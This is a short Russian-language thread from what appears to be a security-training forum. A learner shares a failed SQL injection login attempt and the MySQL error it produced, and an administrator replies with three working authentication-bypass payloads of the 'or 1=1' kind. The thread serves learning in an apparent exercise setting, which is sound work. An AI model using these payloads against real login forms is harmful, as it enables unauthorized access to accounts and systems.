• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

SQL иньекция

~localhost

Green Team
30.10.2017
230
49
BIT
20
привет делаю задание, вообще туго с иньекциями.
после ввода
login:root ' true --
pass" 1

выдает следующую ошибку: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'true --' and `password` = SHA1( CONCAT('1', `salt`)) limit 1' at line 1

Подскажите как проэксплуатировать?
 

N1GGA

Codeby Team
Администратор
16.07.2018
370
357
BIT
522
В пейлоаде нарушен синтаксис SQL. Поэкспериментируй с этими пейлоадами

root' or true -- - root' or 1=1-- - root' or 'a'='a
 
Решение
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!